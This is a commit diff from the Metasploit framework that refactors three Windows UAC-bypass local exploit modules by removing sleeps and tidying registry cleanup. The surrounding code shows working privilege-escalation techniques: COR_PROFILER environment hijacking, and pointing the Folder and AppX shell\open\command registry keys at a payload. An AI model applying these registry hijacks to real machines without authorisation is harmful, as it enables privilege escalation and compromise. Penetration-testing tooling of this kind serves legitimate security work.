Land #17350, Remove unnecesary sleep
Remove unnecesary sleep in several bypassuac modules
This commit is contained in:
commit
d09aef7dc5
|
@ -105,6 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@reg_keys = []
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -140,31 +141,30 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
uuid = SecureRandom.uuid
|
||||
vprint_status("UUID = #{uuid}")
|
||||
reg_keys = []
|
||||
# This reg key will not hurt anything in windows 10+, but is not required.
|
||||
unless sysinfo['OS'] =~ /Windows (2016|10)/
|
||||
reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
|
||||
@reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
|
||||
value_name: '',
|
||||
value_type: "REG_EXPAND_SZ",
|
||||
value_value: payload_pathname,
|
||||
delete_on_cleanup: false)
|
||||
end
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_PROFILER",
|
||||
value_type: "REG_SZ",
|
||||
value_value: "{#{uuid}}",
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_ENABLE_PROFILING",
|
||||
value_type: "REG_SZ",
|
||||
value_value: "1",
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_PROFILER_PATH",
|
||||
value_type: "REG_SZ",
|
||||
value_value: payload_pathname,
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.each do |key_hash|
|
||||
@reg_keys.each do |key_hash|
|
||||
write_reg_value(key_hash)
|
||||
end
|
||||
|
||||
|
@ -179,16 +179,19 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
print_status("Please wait for session and cleanup....")
|
||||
sleep(20)
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @reg_keys.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
reg_keys.each do |key_hash|
|
||||
@reg_keys.each do |key_hash|
|
||||
remove_reg_value(key_hash)
|
||||
end
|
||||
vprint_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
|
@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@registry_key = ''
|
||||
@remove_registry_key = false
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -95,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
|
||||
remove_registry_key = !registry_key_exist?(registry_key)
|
||||
@registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
|
||||
@remove_registry_key = !registry_key_exist?(@registry_key)
|
||||
|
||||
# get directory locations straight
|
||||
win_dir = session.sys.config.getenv('windir')
|
||||
|
@ -116,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
payload = generate_payload_exe
|
||||
reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
|
||||
vprint_status("reg_command = " + reg_command)
|
||||
write_reg_values(registry_key, reg_command)
|
||||
write_reg_values(@registry_key, reg_command)
|
||||
|
||||
# Upload payload
|
||||
vprint_status("Uploading Payload to #{payload_pathname}")
|
||||
|
@ -129,19 +131,22 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue ::Exception => e
|
||||
print_error("Executing command failed:\n#{e}")
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
print_status("Please wait for session and cleanup....")
|
||||
sleep(20)
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @registry_key.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
if remove_registry_key
|
||||
registry_deletekey(registry_key)
|
||||
if @remove_registry_key
|
||||
registry_deletekey(@registry_key)
|
||||
else
|
||||
registry_deleteval(registry_key, "DelegateExecute")
|
||||
registry_deleteval(registry_key, '')
|
||||
registry_deleteval(@registry_key, "DelegateExecute")
|
||||
registry_deleteval(@registry_key, '')
|
||||
end
|
||||
print_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
|
@ -69,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@registry_key = ''
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -103,14 +104,14 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
payload = generate_payload_exe
|
||||
reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
|
||||
vprint_status("reg_command = " + reg_command)
|
||||
registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
|
||||
@registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
|
||||
|
||||
# make registry changes
|
||||
vprint_status("Making Registry Changes")
|
||||
begin
|
||||
registry_createkey(registry_key)
|
||||
registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
|
||||
registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
|
||||
registry_createkey(@registry_key)
|
||||
registry_setvaldata(@registry_key, "DelegateExecute", '', "REG_SZ")
|
||||
registry_setvaldata(@registry_key, '', reg_command, "REG_SZ")
|
||||
rescue ::Exception => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
|
@ -126,13 +127,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue ::Exception => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
sleep(20)
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @registry_key.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
registry_deletekey(registry_key)
|
||||
registry_deletekey(@registry_key)
|
||||
vprint_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
Loading…
Reference in New Issue